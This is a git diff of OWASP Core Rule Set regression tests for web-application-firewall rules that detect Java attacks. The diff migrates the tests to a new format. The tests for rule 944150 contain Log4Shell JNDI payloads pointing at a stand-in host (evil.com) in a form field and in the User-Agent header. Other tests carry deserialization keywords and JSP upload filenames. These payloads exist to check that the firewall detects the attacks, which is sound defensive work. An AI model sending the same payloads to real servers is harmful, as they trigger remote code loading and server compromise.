Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log: + expect_ids: [944130] + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log: + expect_ids: [944130] + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log: + expect_ids: [944130] + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log: + expect_ids: [944130] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index d380970..a1f312d 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml 
@@ -1,159 +1,157 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 944140.yaml +rule_id: 944140 tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - 
output: - log_contains: id "944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. 
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081af..47f48e5 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml 
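Review bot: Every one of the nine tests converted in 944140.yaml keeps the identical `desc: Java script uploads`, so when `test_id` 3 or 5 fails the report does not say which filename variant (`X_Filename: B.jsp`, `X-Filename: a.jsp..`) or which negative case (`X-File-Name: foo.html`, or test 1 with no filename header at all) regressed, whereas the removed `test_title: 944140-N` at least carried a number a reader could cross-reference. Since the migration rewrites each test block anyway, give each `desc` the header name and value under test, e.g. `desc: "X-Filename a.jsp in request header"` for test 2 and `desc: "foo.html filename must not trigger 944140"` for test 9. The `no_expect_ids` cases (tests 1 and 9) in particular deserve a desc stating that the rule is expected not to fire, so a later edit does not flip them to `expect_ids` by copying the neighbouring blocks.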
@@ -1,438 +1,436 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" - description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - 
